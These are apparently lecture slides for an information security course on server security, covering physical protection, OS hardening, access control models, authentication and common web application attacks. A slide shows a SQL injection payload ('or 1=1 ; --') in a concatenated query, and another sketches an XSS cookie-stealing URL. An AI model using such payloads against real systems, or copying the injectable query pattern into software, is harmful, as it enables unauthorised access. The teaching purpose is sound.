Info Security Technology

Topic 3
Server Security

1
 References

• Security+ Guide to Network Security

Fundamentals, Third Edition; Mark
Ciampa.
– Chapter 5: Host Security (Pg 161-181)
– Chapter 9: Access Control (pg 331-344)
– Chapter 10: Authentication (pg 365 -382)
– Chapter 3: Web Application Attacks (Pg 87-89)

2
 Objectives

• List the steps for securing a host computer

• Define access control
• Describe authentication credentials
• Explain the Web application attacks

3
Server Room
• DNS Server
• Web Server
• Application
Server
• Email Server
• Database Server
• File Server

4
 Securing the Host

• Securing the host involves:

a) Protecting the physical device
• Physical access to equipment
• Secure equipment
b) Securing the operating system software
• Five-step process
c) Using security-based software applications
• Anti-virus, Anti-Spam, Pop-up blockers, Firewall

5
Protecting the physical device

• Prevent unauthorized physical access to

equipment
• Secure equipment – portable devices

6
 Physical Access
Law #3: If a bad guy has unrestricted physical access to your
computer, it's not your computer anymore.
• Oh, the things a bad guy can do if he can lay his hands on your
computer! Here's a sampling, going from Stone Age to Space Age:
– He could mount the ultimate low-tech denial of service attack, and smash your
computer with a sledgehammer.
– He could unplug the computer, haul it out of your building, and hold it for ransom.
– He could boot the computer from a floppy disk, and reformat your hard drive. But
wait, you say, I've configured the BIOS on my computer to prompt for a password
when I turn the power on. No problem – if he can open the case and get his hands
on the system hardware, he could just replace the BIOS chips. (Actually, there are
even easier ways).
– He could remove the hard drive from your computer, install it into his computer,
and read it.
– He could make a duplicate of your hard drive and take it back his lair. Once
there, he'd have all the time in the world to conduct brute-force attacks, such as
trying every possible logon password. Programs are available to automate this
and, given enough time, it's almost certain that he would succeed.
– He could replace your keyboard with one that contains a radio transmitter. He
could then monitor everything you type, including your password.

 Reference: 10 Immutable Laws of Security (by Microsoft)

7
 Physical Access
• Physical access control
includes
– Hardware Locks

– Proximity Readers

– Access List

– Mantrap

– Video surveillance

– Fencing

8
 Secure Equipment

• Portable devices have steel

bracket security slot or cable
lock
Cable lock

• Notebooks may be placed in

a safe

• Locking cabinets Safe

Locking
Cabinet

9
 Securing the operating system software

• Develop the security policy

• Perform host software
baselining
• Configure operating system
Five-step process security and settings
for protecting • Deploy the settings
operating system • Implement patch management

10
 Develop the security policy

Most organizations have security

policies:
• Acceptable use
• Anti-virus
• Password management
• E-mail and retention
• Wireless communication
• Disposal and destruction

11
 Perform host software baselining
• Baseline is checklist against which an operating system
can be evaluated to implement an effective and
efficient security infrastructure

• Microsoft Baseline Security Analyzer (MBSA) performs an

audit check on Windows operating system to reveal
security vulnerabilities and recommend settings for
hardening the operating system.

• Some of the checks that MBSA performs:

– Check for missing security updates
– Check for file system type on hard drives
– Check if Guest account is enabled
– Check the number of local Administrator accounts
– Check for blank or simple local user account passwords
– Check if unnecessary services are running
12
 Configure security and settings
• Steps to configure security and settings:
1. Change insecure default settings:
• Restrict permissions on files and directories
• Remove guest accounts
• Apply password guidelines
2. Eliminate unnecessary software, devices, services and
protocols
3. Enable security features such as a Windows firewall

13
 Deploy the settings
• Deploy the settings
– A security template is created and deployed for all
computers
– Use tools to automate the process to each computer
– In Microsoft, a security template is a collection of
security configuration settings that includes the
following:
• Account policies
• User rights
• Event log settings
• System services
• File permissions
• Registry permissions

14
 Implement Patch Management
• To address vulnerability in operating systems that are
uncovered after the software has been released, software
vendors usually deploy software fixes to address the
vulnerabilities.
– Patch - A broadly released software security update
intended to cover vulnerabilities that have been discovered
– Hotfix - Addresses a specific customer situation; often not
distributed outside that customer’s organization
– Service Pack - A cumulative package of all hotfixes,
patches and updates.

15
 Using security-based software
applications

• Anti-virus
• Anti-spam
• Pop-up blockers
• Firewall

16
 Host based Firewall

• Host-based software firewall runs on server

• Designed to prevent malicious packets from
entering or leaving computers
– Monitors inbound and outbound traffic flowing through your
computer
– Requests from unknown or unsolicited source are identified
and blocked
– Hides your computer from hackers.
• Examples:
– Windows 7 Firewall
– Zone Alarm Firewall

17
 Access Control
Basic Steps of Access Control
• Identification
– To assign an identity to a user accessing a computer
system such as a username.
• Authentication
– To verify user credentials to be sure that they are who
they claim to be and not an imposter. One way to
authenticate is to use password.
• Authorization
– To grant permission or ability to access confidential
information; such as user authorized to login
• Granted access rights
– To give rights to certain services or applications in
order to perform duties, such as user allowed to
access specific data.

18
 Access Control
Access control model
– Provides a predefined framework for hardware and
software developers who need to implement access
control in their devices or applications
• There are four major access control models
a. Mandatory Access Control
b. Discretionary Access Control
c. Role Based Access Control
d. Rule Based Access Control

19
 Mandatory Access Control
• Mandatory Access Control (MAC) model
– This is the most restrictive model because all controls are
fixed
– The owner and security policy administrator are responsible
for managing access controls.
– The end user cannot implement, modify, or transfer any
controls
– MAC model is typically used in defense and military
environments where it is absolutely vital to ensure that
documents do not fall into wrong hands.

20
 Discretionary Access Control
• Discretionary Access Control (DAC) model
– The least restrictive model used in a home environment
– A user has total control over any resources that he or she
owns.
– A user can also change the permissions for other users over
resources
– To overcome the vulnerabilities , O/S such as Apple
Macintosh, UNIX and Windows 7 prompt users for permission
whenever software is installed - known as User Account
Control (UAC)

21
 Role Based Access Control
• Role Based Access Control (RBAC) model
– Considered a more “real world” approach than the other
models
– Assigns permissions to particular roles in the organization,
and then assigns end users to that role.
– Resources are set to users with that particular role to access
– Systems implemented some form of RBAC include Microsoft
Active Directory, Microsoft SQL Server and Oracle DBMS.

22
 Rule Based Access Control
• Rule Based Access Control (RBAC) model
– Dynamically assign access to users based on a set of rules
defined by a custodian (security policy administrator )
– Rule Based Access Control is often used for managing user
access to one or more systems.
• For example, situations such as permitting access for an
account or group to a network connection at certain
hours of the day or days of the week.

23
 Authentication
Types of authentication methods
• What you knows
– Passwords, Pin, etc
• What you have
– NRIC, Passport, OTP (one time passwords)
• What you are
– Biometrics – fingerprint, retina, face, voice, gait, etc

24
 Types of authentication
methods
What a user knows
• Password
• PIN

25
 Passwords
• Password
– The most common
logical access control
– A secret combination
of letters and
numbers that only the
user knows
– A password should
never be written
down
• Must also be of a
sufficient length and
complexity so that
an attacker cannot
easily guess it.
26
 Attacks on passwords
• Social Engineering
– Includes phishing, shoulder surfing, dumpster diving
• Capturing
– Includes key logger and protocol analyzer
• Resetting Physical access is required
– Includes Cd or USB flash drive reboot
• Online guessing
– Attacker attempt different passwords at login prompt
• Offline cracking
– Attackers try to steal the file of hashed passwords and then break
the hashed passwords offline

27
 Offline Cracking of
passwords
• Brute force attack
– Simply trying to guess a password through combining a random
combination of characters
• Dictionary attack
– Compares those hashed dictionary words against those in a
stolen password file
• Rainbow tables
– Make password attacks easier by creating a large pre-generated
data set of hashes from nearly every possible password
combination

28
 Types of authentication
methods
What a user has
• NRIC, Passport
• OTP (one time passwords)
– Methods of generating
• Time-synchronised
• Challenge-based
– Methods of distributing
• Over SMS on Mobile Phone
• On Proprietary tokens

29
 Types of authentication
methods
What a user is
• Standard biometrics
• Fingerprint;
• Retina;
• Face
• Behavioral biometrics
• Keystroke dynamics;
• voice recognition;
• computer foot printing
• Gait (pattern of movement)
• Cognitive biometrics
• Memorable events
• Identify specific faces http://www.passfaces.com/personal/
30
 Single and multi-factor
authentication
• One-factor authentication
– Using only one authentication credential
• Multi-factor authentication
– Enhances security, particularly if different types of
authentication methods are used

31
 Web Application Attacks
• Web applications an essential element of organizations
today
• The web browser makes a request using HTTP to a web server,
which may be connected to an application server.

Web application infrastructure

32
 Web Application Attacks
• The following traditional security features do not work
– Hardening the Server Operating System
– Protect the network
• By design, web server operating system must process HTTP and
therefore need to open port 80 to service web browser access.
• Network devices such as routers and firewall must also configured
to allow HTTP traffic to access the Web server.

Web application security

33
 Web Application Attacks
• Common Web Application Attacks
– SQL injection
– Cross site scripting
– XML injection

34
 SQL injection
• Hinges on an attacker being able to enter an SQL
database query into a dynamic Web page
• SQL (structured query language)
– A language used to view and manipulate data that is stored in a
relational database

35
 How SQL injection works?
strSQL = "SELECT * from UserTable Where UserID='" & tb_userid.Text &
" ' AND ' Pword='" & tb_pword.Text & "' "

strSQL = "SELECT * from UserTable Where UserID='' or 1=1 ; -- " &

" AND ' Pword='" & tb_pword.Text & "' "

-- means
comment

36
 SQL injection

• Variations to the SQL injection attack

– Deleting data from the database
– Accessing the host operating system
through function calls
– Retrieving a list of all usernames and
passwords

37
Hardening Web Servers

38
 Cross Site Scripting
• An attack in which malicious code is inserted into a dynamic
Web page.
• Typically involves using client-side scripts written in JavaScript
• Designed to extract information from the victim and then pass
the information to the attacker
• Targeted to Web sites that dynamically generate Web pages
that redisplay (echo) user input that has not been properly
validated

39
 Cross Site Scripting
• Cross Site Scripting (XSS) attack steps
– An attacker searches for a Web site that vulnerable to XSS.
• Eg. Echo response such as bad login
– The attacker then creates an attack URL that contains the
embedded JavaScript commands; eg
http://www.123.com/login.asp?id=<script …..
– A fake e-mail is sent to unsuspecting users with the attack URL as
a modified embedded link in the e-mail
– The unsuspecting victim clicks on the attack URL
– The Javascript extracts the victim’s cookie and send to the
attacker site.

40
 XML injection
• Similar to a SQL injection attack
• Attackers inject XML tags and data into the database

41
 Summary
• Securing the server involves physical access
control to limit access to computer equipment
by unauthorized users and hardening the
operating system to resist attacks.
• Access control is the process by which resources
or services are denied or granted. Four major
access control models exist.
• Authentication credentials can be classified into
three categories: what you know, what you
have, and what you are.
• Web servers are prime targets for attackers

42